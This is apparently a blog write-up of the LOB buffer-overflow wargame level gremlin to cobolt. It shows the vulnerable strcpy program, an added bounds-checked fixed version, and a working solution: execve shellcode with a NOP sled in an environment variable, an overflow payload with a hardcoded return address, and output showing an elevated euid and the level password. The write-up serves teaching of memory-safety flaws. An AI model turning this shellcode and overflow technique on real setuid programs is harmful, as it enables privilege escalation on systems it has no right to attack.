[2] gremlin -> cobolt ( Small BOF )

2017. 11. 17. 13:17  SystemHacking/LOB (BOF Expedition)



gremlin / hello bof world

Required before solving the challenge !!

[gremlin@localhost gremlin]$ /bin/bash2

[gremlin@localhost gremlin]$ export SHELL=/bin/bash2



[ cobolt.c ]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16];            /* 16-byte stack buffer */
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);    /* unbounded copy: argv[1] longer than 15 bytes overflows buffer */
    printf("%s\n", buffer);
}


[ Stack layout ]

buffer        16 bytes

saved ebp      4 bytes

saved eip      RET (return address)
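[ cobolt_fixed.c ] An added defensive counterpart to cobolt.c, not part of the LOB challenge: the copy is bounded by the buffer size, so an argument of 16 bytes or more (including the 20-byte padding used in the write-up) is rejected instead of overwriting saved ebp and RET. copy_arg() is a helper name chosen here for illustration.

```c
/* Hardened counterpart to cobolt.c (added example, not LOB's own code).
 * The original copies argv[1] into a 16-byte stack buffer with strcpy(),
 * so any argument of 16 bytes or more runs past the buffer into saved
 * ebp and the return address. The fix: refuse input that does not fit. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 16

/* Copy src into dst (capacity dst_size) only if it fits, NUL included.
 * Returns 0 on success, -1 if the input would overflow (dst is emptied). */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {          /* 16 chars + NUL would need 17 bytes */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);      /* bounded: at most dst_size bytes */
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n",
                (int)(sizeof buffer - 1));
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```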


< Solution >


1> Put the shellcode in an environment variable

$ export tmp=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')

$ env    <- check that the variable was set


2> Build the payload

[gremlin@localhost gremlin]$ ./cobolt $(python -c 'print "A" * 20 + "\xaa\xfa\xff\xbf"')

AAAAAAAAAAAAAAAAAAAA▒▒▒▒

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ my-pass

euid = 502

hacking exposed

bash$